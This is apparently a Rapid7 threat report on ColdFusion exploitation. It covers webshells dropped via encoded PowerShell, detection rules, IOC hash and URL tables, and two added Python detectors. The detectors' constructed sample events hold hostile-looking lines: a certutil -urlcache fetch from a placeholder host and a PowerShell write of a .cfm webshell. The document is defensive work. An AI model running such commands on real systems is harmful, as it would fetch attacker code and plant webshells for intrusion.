Rapid7’s Threat Intelligence and Detection Engineering team has identified active exploitation of Adobe ColdFusion in multiple customer environments. The observed activity dates back to January 2023 and has not been tied back to a specific CVE at this time. IOCs are included below.
Rapid7 has existing detection rules within InsightIDR that have identified this activity and has created additional rules based upon this observed behavior. We have also observed the compromised website, ooshirts[.]com, being used in other attacks dating back to March 2022.
The earliest time frame of compromise identified thus far occurred in early January 2023. Rapid7 discovered evidence indicating that a malicious actor dropped webshells using an encoded PowerShell command. Process start data indicates that ColdFusion 2018 is spawning malicious commands.
Example base64 encoded command executed by malicious actor through ColdFusion:
Decoded:
In our current investigations, both previously existing and new detections have been observed triggering post-exploitation across Rapid7 InsightIDR and Managed Detection & Response (MDR) customers:
Webshell - Possible ColdFusion Webshell In Command Line
This detection identifies common ColdFusion tags being passed in the command line. This technique is used by malicious actors when redirecting strings into files when creating webshells.
Attacker Technique - CertUtil With URLCache Flag
This detection identifies the use of the ‘certutil.exe’ binary with the ‘-urlcache’ flag being passed to it. This technique is used by malicious actors to retrieve files hosted on a remote web server and write them to disk.
Malicious actors have been observed using this technique, redirecting strings into files to create webshells. Look for *.cfm files in ColdFusion webroots containing the following ColdFusion tags:
Review process start logs for any abnormal child processes of ColdFusion Server.
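The two detections and the log-review step above can be exercised offline with the following added example. It is not Rapid7's rule source or telemetry from the investigation: the process-start events are constructed Sysmon-style records, the ColdFusion tag set is this example's own choice (the page's tag list is not reproduced here), and the assumption that the ColdFusion service runs from a path containing "coldfusion" is labelled in the code. It flags shells spawned by the ColdFusion service, `certutil` with `-urlcache`, ColdFusion tags appearing in a command line (including inside a decoded `-EncodedCommand` payload, as in the encoded PowerShell described above), and redirection into a `.cfm` file.

```python
import base64
import re
from typing import Dict, List, Tuple

# Added example, not Rapid7's detection rule source or telemetry from the
# investigation. Events are constructed Sysmon-style process-start records.

# Assumption: tags to look for in command lines. The page's own tag list is not
# reproduced here, so this set (real ColdFusion tags) is this example's choice.
CF_TAGS = ("<cfexecute", "<cfscript", "<cffile", "<cfhttp", "<cfdump")

# Child images that are unusual for the ColdFusion service to spawn.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "bitsadmin.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or ''."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError
        return ""


def analyze_event(ev: Dict[str, str]) -> List[str]:
    """Return the list of reasons an event is suspicious (empty if none)."""
    parent = ev.get("parent_image", "").lower()
    image = basename(ev.get("image", ""))
    cmd = ev.get("command_line", "")
    decoded = decode_encoded_command(cmd)
    text = (cmd + " " + decoded).lower()
    reasons: List[str] = []
    # Assumption: the ColdFusion service binary lives under a path containing
    # "coldfusion" (e.g. C:\ColdFusion2018\cfusion\bin\coldfusion.exe).
    if "coldfusion" in parent and image in SHELLS:
        reasons.append("coldfusion-child-shell")
    if "certutil" in text and "-urlcache" in text:
        reasons.append("certutil-urlcache")
    if any(tag in text for tag in CF_TAGS):
        reasons.append("cf-tag-in-command-line")
        if ">" in text or ".cfm" in text:
            reasons.append("possible-webshell-write")
    if decoded:
        reasons.append("encoded-powershell")
    return reasons


def analyze(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Index and reasons for every event that triggers at least one check."""
    return [(i, r) for i, ev in enumerate(events) if (r := analyze_event(ev))]


def sample_events() -> List[Dict[str, str]]:
    """Constructed events: three suspicious, two benign. Paths are illustrative."""
    cf = r"C:\ColdFusion2018\cfusion\bin\coldfusion.exe"
    webroot = r"C:\ColdFusion2018\cfusion\wwwroot"
    # The encoded command is built here so the base64 is guaranteed to be valid.
    ps_script = f"Set-Content -Path {webroot}\\wow1.cfm -Value '<cfscript>...</cfscript>'"
    encoded = base64.b64encode(ps_script.encode("utf-16-le")).decode()
    return [
        {"parent_image": cf, "image": r"C:\Windows\System32\cmd.exe",
         "command_line": f"cmd.exe /c certutil.exe -urlcache -f http://example.invalid/zzz.txt {webroot}\\zzz.txt"},
        {"parent_image": cf, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "command_line": f"powershell.exe -nop -w hidden -EncodedCommand {encoded}"},
        {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
         "command_line": r'cmd.exe /c echo "<cfexecute ...>" > C:\inetpub\wwwroot\test.cfm'},
        {"parent_image": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\certutil.exe",
         "command_line": r"certutil.exe -hashfile C:\Temp\installer.msi SHA256"},
        {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
         "command_line": "notepad.exe readme.txt"},
    ]


if __name__ == "__main__":
    for idx, why in analyze(sample_events()):
        print(f"event {idx}: {', '.join(why)}")
```

The `certutil -hashfile` event is deliberately not flagged: the detection keys on the `-urlcache` flag, not on `certutil.exe` itself, which keeps ordinary certificate-store use out of the alert queue. Decoding `-EncodedCommand` before matching matters because the tags never appear in the raw command line of the second event.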
File items:
Type | Value | Notes |
---|---|---|
Filename | WOW.TXT | ColdFusion WebShell |
Filename | wow.txt | ColdFusion WebShell |
Filename | www.txt | ColdFusion WebShell |
Filename | www.cfm | ColdFusion WebShell |
Filename | wow1.cfm | ColdFusion WebShell |
Filename | zzz.txt | ColdFusion WebShell |
Filename | dncat.exe | DotNetCat |
Filename | nc.exe | NetCat |
SHA-256 | e77d6a10370db19b97cacaeb6662ba79f34087d6eaa46f997ea4956e2ad2f245 | ColdFusion WebShell |
SHA-256 | 2482ab79ecb52e1c820ead170474914761358d3cee16e3377fd6e031d3e6cc25 | ColdFusion WebShell |
SHA-256 | 03b06d600fae4f27f6a008a052ea6ee4274652ab0d0921f97cfa222870b1ddc3 | ColdFusion WebShell |
SHA-256 | be56f5ed8e577e47fef4e0a287051718599ca040c98b6b107c403b3c9d3ee148 | ColdFusion WebShell |
MD5 | 1edf1d653deb9001565b5eff3e50824a | DotNetCat |
SHA-1 | 5d95fb365b9d0ceb568bb0c75cb1d70707723f27 | DotNetCat |
SHA-256 | 213079ef54d225c4ca75dd0d57c931bdc613e8c89a2d0dbff88be5b446d231f0 | DotNetCat |
MD5 | 470797a25a6b21d0a46f82968fd6a184 | NetCat |
SHA-1 | dac7867ee642a65262e153147552befb0b45b036 | NetCat |
SHA-256 | ce80b839411b1541d09b0ede82f1477b516da0c60760079f46ba4443e1a6f419 | NetCat |
Network-based indicators:
Type | Value | Notes |
---|---|---|
FQDN | www.av-iq[.]com | Legitimate Compromised Domain |
FQDN | www.ooshirts[.]com | Legitimate Compromised Domain |
URL | hXXps://www.av-iq[.]com/wow.txt | ColdFusion WebShell |
URL | hXXps://www.ooshirts[.]com/images/zzz.txt | ColdFusion WebShell |
URL | hXXps://www.ooshirts[.]com/images/dncat.exe | DotNetCat |
URL | hXXp://www.ooshirts[.]com/images/nc.exe | NetCat |
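To turn the file-item table above into a webroot sweep, the following added example (not Rapid7 tooling) walks a directory, hashes every file with SHA-256 and matches it against the six SHA-256 values from the table, flags the listed filenames (case-folded, so `WOW.TXT` and `wow.txt` match the same entry), and, because the staged webshells were served as `.txt` as well as `.cfm`, inspects `.cfm`, `.cfc` and `.txt` files for ColdFusion tags. The tag set is this example's assumption, as the page's tag list is not reproduced. The webroot it scans is constructed in a temporary directory so the code runs offline; the `extra_sha256` parameter exists so a locally gathered hash can be added to the page's list.

```python
import hashlib
import os
import re
import tempfile
from typing import Dict, FrozenSet, List

# Added example, not Rapid7 tooling. SHA-256 values and filenames are the
# indicators from the tables on this page; the webroot below is constructed.
IOC_SHA256 = {
    "e77d6a10370db19b97cacaeb6662ba79f34087d6eaa46f997ea4956e2ad2f245",  # ColdFusion WebShell
    "2482ab79ecb52e1c820ead170474914761358d3cee16e3377fd6e031d3e6cc25",  # ColdFusion WebShell
    "03b06d600fae4f27f6a008a052ea6ee4274652ab0d0921f97cfa222870b1ddc3",  # ColdFusion WebShell
    "be56f5ed8e577e47fef4e0a287051718599ca040c98b6b107c403b3c9d3ee148",  # ColdFusion WebShell
    "213079ef54d225c4ca75dd0d57c931bdc613e8c89a2d0dbff88be5b446d231f0",  # DotNetCat
    "ce80b839411b1541d09b0ede82f1477b516da0c60760079f46ba4443e1a6f419",  # NetCat
}
IOC_NAMES = {"wow.txt", "www.txt", "www.cfm", "wow1.cfm", "zzz.txt", "dncat.exe", "nc.exe"}

# Assumption: tags worth flagging in webroot files (this example's choice).
CF_TAG_RE = re.compile(rb"<cf(?:execute|script|file|http|dump)\b", re.IGNORECASE)
INSPECT_EXT = (".cfm", ".cfc", ".txt")
MAX_READ = 1 << 20  # only the first MiB is scanned for tags


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_webroot(root: str, extra_sha256: FrozenSet[str] = frozenset()) -> List[Dict]:
    """Return one finding per file that matches a name, hash or tag indicator."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            reasons = []
            if name.lower() in IOC_NAMES:
                reasons.append("ioc-filename")
            digest = sha256_file(path)
            if digest in IOC_SHA256 or digest in extra_sha256:
                reasons.append("ioc-sha256")
            if name.lower().endswith(INSPECT_EXT):
                with open(path, "rb") as f:
                    if CF_TAG_RE.search(f.read(MAX_READ)):
                        reasons.append("cf-tag-content")
            if reasons:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append({"rel": rel, "sha256": digest, "reasons": reasons})
    return sorted(findings, key=lambda f: f["rel"])


# Constructed fixture: a normal page, an IOC-named file with tags, an IOC-named
# file without tags, and a binary that matches nothing.
SAMPLE_FILES = {
    "index.cfm": b"<cfoutput>#now()#</cfoutput>\n",
    "images/zzz.txt": b"<cfscript>...</cfscript>\n",
    "WOW.TXT": b"harmless note\n",
    "images/logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
}


def build_sample_webroot() -> str:
    root = tempfile.mkdtemp(prefix="cf_wwwroot_")
    for rel, data in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)
    return root


if __name__ == "__main__":
    for finding in scan_webroot(build_sample_webroot()):
        print(f"{finding['rel']}: {', '.join(finding['reasons'])} ({finding['sha256'][:12]}...)")
```

On a real host, point `scan_webroot` at each ColdFusion webroot (and at any directory the web server can write to) and review every `cf-tag-content` hit in a `.txt` file, since ColdFusion tags have no business in a text file served from `/images/`. The MD5 and SHA-1 values from the table are omitted here because the SHA-256 entries cover the same three artifacts.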
MITRE ATT&CK Tactic/Technique/Subtechniques
TA0042 Resource Development (tactic):
TA0001 Initial Access (tactic):
TA0002 Execution (tactic):
TA0003 Persistence (tactic):
TA0011 Command & Control (tactic):
While we have not tied this behavior back to exploitation of a specific CVE, Adobe released patches for known vulnerabilities in ColdFusion on March 14, 2023. At least one of the CVEs patched in version 16 (ColdFusion 2018) and version 6 (ColdFusion 2021) is known to be exploited in the wild. Rapid7’s vulnerability research team has successfully chained CVE-2023-26359 and CVE-2023-26360 for unauthenticated remote code execution; in-depth analysis and proof-of-concept code are available in AttackerKB here.
We strongly advise ColdFusion customers to update to the latest version to remediate known risk, regardless of whether the behavior we have detailed in this blog is related to recent vulnerabilities. We also advise customers to examine their environments for signs of compromise.
InsightVM and Nexpose customers are able to assess their exposure to known Adobe ColdFusion vulnerabilities via recurring vulnerability check coverage.
Eoin Miller contributed to this article.